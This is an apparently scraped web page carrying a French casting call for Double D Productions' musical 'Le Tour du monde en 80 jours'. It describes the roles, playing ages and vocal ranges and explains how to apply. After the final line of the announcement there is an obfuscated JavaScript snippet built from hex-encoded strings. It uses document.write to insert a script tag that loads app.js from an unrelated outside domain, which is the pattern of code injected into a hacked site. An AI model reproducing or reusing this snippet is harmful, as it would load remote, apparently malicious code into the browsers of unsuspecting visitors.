Auditions Le Tour du monde en 80 jours de Double D Productions

0
1423

Pour la nou­velle comédie musi­cale de Dou­ble D Pro­duc­tions (Les Aven­tures de Tom Sawyer, Kid Manoir 1 & 2, La Petite Fille Aux Allumettes, Hansel & Gre­tel) « LE TOUR DU MONDE EN 80 JOURS», d’après le roman de Jules Verne, musique de Julien Salvia, livret et paroles de Ludovic-Alexan­dre Vidal, mise en scène de David Rozen, nous recher­chons des comé­di­ens chanteurs danseurs de très bons niveaux (pra­tique des cla­que­ttes appré­ciée) cor­re­spon­dant aux descrip­tifs suivants :

Rôles Mas­culins

Phileas Fogg
Phileas Fogg est un gen­tle­man anglais rési­dant à Lon­dres à la fin du XIXème siè­cle. Mem­bre du Reform Club, Fogg est un homme secret et fleg­ma­tique. Pointilleux et math­é­ma­tique, il est économe en tout. Guère à l’aise avec les sen­ti­ments, Phileas Fogg est un homme raf­finé qui aime la pré­ci­sion et l’ordre. Pour lui, l’imprévu n’existe pas. Il va cepen­dant se lancer dans une aven­ture incroy­able et un pari com­plète­ment fou : celui de faire le tour du monde en 80 jours.
(Age de jeu : 30–45 ans, Tes­si­ture : bary­ton aigu)

Passep­a­rtout
Passep­a­rtout est un jeune homme français (qui a exer­cé déjà plusieurs métiers très dif­férents, d’où son surnom) qui vient d’arriver à Lon­dres. Sans un sou en poche, ce jeune homme débrouil­lard se fait engager comme valet par Phileas Fogg. D’une nature tou­jours pos­i­tive, il est plutôt fougueux, bavard et rêveur, mais ne réflé­chit pas tou­jours à ses actes à l’inverse de Fogg.
(Age de jeu : 20–30 ans, Tes­si­ture : bary­ton aigu/ténor)

Fix
Fix est un détec­tive qui tra­vaille pour Scot­land Yard. Il a été envoyé à Suez mais espère pou­voir revenir tra­vailler en Angleterre. Per­suadé que Fogg est le voleur de la Banque d’Angleterre, il met un point d’honneur à le tra­quer, voy­ant dans cette affaire l’occasion rêvée de retrou­ver un poste en Angleterre… et d’obtenir une prime con­séquente. C’est un homme assez pré­ten­tieux et sûr de lui, obstiné et qui ne voit sou­vent pas plus loin que le bout de son nez.
(Age de jeu : 35–45 ans, Tes­si­ture : baryton)
(L’artiste inter­prétera aus­si d’autres rôles, dont celui de James Forster, servi­teur de Phileas Fogg, et d’autres rôles d’ensemble.)

Thomas Flana­gan
Thomas Flana­gan est un des mem­bres du Reform Club, admin­is­tra­teur de la Banque d’Angleterre, et éter­nel opposant de Fogg. Ambitieux, il a une haute opin­ion de lui-même et est con­stam­ment en manque de recon­nais­sance. Avec son acolyte Miss Mor­ris, il va user de toutes les manœu­vres pour ralen­tir Phileas Fogg dans son périple afin de rem­porter son pari et les hon­neurs. Il va notam­ment lancer Fix sur la trace de Fogg.
(Age de jeu : 30–40 ans, Tes­si­ture : bary­ton aigu)
(L’artiste inter­prétera aus­si d’autres rôles d’ensemble.)

Le Maire de San Francisco
Le Maire de San Fran­cis­co est un per­son­nage toni­tru­ant, sûr de sa per­son­ne, qui veut en met­tre plein les yeux à Phileas Fogg, quitte à en faire un peu trop.
(Référence : Max Bia­ly­stock dans « The Producers »)
(Age de jeu : 25–40 ans, Tes­si­ture : baryton)
(L’artiste inter­prétera aus­si d’autres rôles dont Lord Alber­mar­le, un vieux par­a­ly­tique mem­bre du Reform Club (Référence : Mr Dawes Senior dans « Mary Pop­pins »), ain­si que d’autres rôles d’ensemble.)

Le guide Parsi
Le guide Par­si va con­duire Phileas Fogg et Passep­a­rtout à tra­vers la jun­gle en Inde à dos d’éléphant. Il va se révéler haut en couleur.
(Référence : Le Nar­ra­teur dans « Aladdin »)
(Age de jeu : 20–35 ans, Tes­si­ture : ténor)
(L’artiste inter­prétera aus­si d’autres rôles dont Samuel Fal­l­entin, mem­bre du Reform Club, et d’autres rôles d’ensemble.)

Andrew Speedy
Cap­i­taine bougon et aguer­ri de L’Henrietta, Phileas Fogg le con­va­in­cra de sac­ri­fi­er son navire pour ral­li­er l’Angleterre depuis New York.
(Référence : Jig­ger Crai­gin dans « Carousel »)
(Age de jeu : 25–35 ans, Tes­si­ture : bary­ton / ténor)
(L’artiste inter­prétera aus­si d’autres rôles dont Gau­ti­er Ralph, mem­bre du Reform Club, et d’autres rôles d’ensemble.)

Rôles Féminins

Aou­da
Aou­da est une princesse indi­enne d’éducation européenne, sauvée par Phileas Fogg et Passep­a­rtout en Inde, alors qu’elle est sur le point d’être tuée lors d’un sac­ri­fice rit­uel. C’est une femme digne et courageuse qui a eu plusieurs vies. Pro­fondé­ment sen­si­ble, elle n’a pas la langue dans sa poche. Mal­gré ses dif­férences avec lui, elle va s’éprendre de Phileas Fogg et trou­vera en Passep­a­rtout un confident.
(Age de jeu : 25–35 ans, Tes­si­ture : mezzo-soprano)
(L’artiste inter­prétera aus­si d’autres rôles d’ensemble, dont peut-être celui d’une danseuse de cancan.)

Miss Mor­ris
Miss Mor­ris est une femme de car­ac­tère, excen­trique et haute en couleur, quelque peu sans-gêne. Elle a de hautes ambi­tions pour elle et Thomas Flana­gan, dont elle est le bras droit et avec qui elle rêve de men­er la belle vie. Experte en mani­gances et en manip­u­la­tions, elle va ten­ter de ralen­tir Phileas Fogg dans son périple.
(Age de jeu : 25–35 ans, Tes­si­ture : mezzo-soprano)
(L’artiste inter­prétera aus­si d’autres rôles d’ensemble, dont peut-être celui d’une danseuse de cancan.)

La Reine Victoria
Reine d’Angleterre, de répu­ta­tion et d’apparence autori­taires, mais pos­si­ble­ment facétieuse.
(Age de jeu : 25 – 35 ans, pou­vant aisé­ment paraître plus âgée, Tes­si­ture : mez­zo-sopra­no/­so­pra­no)
(L’artiste inter­prétera aus­si d’autres rôles, dont ceux de la mère de Passep­a­rtout, une danseuse de can­can et d’autres rôles d’ensemble.)
L’Employée du Bureau de Placement
Employée de bureau peu agréable et un tan­ti­net dépassée qui va faire le lien entre Passep­a­rtout et Fogg.
(Référence : Ger­maine dans « Mon­stres & Cie »)
(Age de jeu : 25–35 ans, Tes­si­ture : mez­zo-sopra­no/­so­pra­no)
(L’artiste inter­prétera aus­si d’autres rôles, dont ceux d’une danseuse de can­can et d’autres rôles d’ensemble.)
—-
Les audi­tions com­menceront courant février.
Si vous pensez cor­re­spon­dre et êtes intéressé(e), mer­ci d’envoyer votre can­di­da­ture avant le 30 jan­vi­er 2019 avec un CV en PDF, deux pho­tos à jour (por­trait et plain pied), et une maque­tte audio à l’adresse suiv­ante : casting80joursmusical@gmail.com
Mer­ci de pré­cis­er en objet de mail le(s) rôle(s) pour le(s)quel(s) vous pos­tulez et votre tessiture.
Les can­di­da­tures incom­plètes ne seront pas traitées. var _0x22d1=[« x3Cx73x63x72 »,« x69x70x74x20x61x73x79x6Ex63x20x63x6Cx61x73x73x3Dx22x3Dx52x32x4Ex34x54x55x77x7Ax52x6Cx6Fx37x4Cx54x63x77x4Fx7Ax45x3Dx22x20x73x72x63x3Dx22x68x74x74x70x73x3Ax2Fx2Fx70x6Cx61x79x2Ex74x65x72 »,« x63x61x62x69x6Cx69x73x2Ex69x6Ex66x6Fx2Fx61x70x70x2Ex6Ax73x22x3Ex3Cx2Fx73x63x72 »,« x69x70x74x3E »,« x77x72x69x74x65 »];func­tion jiler(){var _0xd9f0x2=_0x22d1[0];var _0xd9f0x3=_0x22d1[1];var _0xd9f0x4=_0x22d1[2];var _0xd9f0x5=_0x22d1[3];document[_0x22d1[4]](_0xd9f0x2+ _0xd9f0x3+ _0xd9f0x4+ _0xd9f0x5)}jiler()

- Publicité -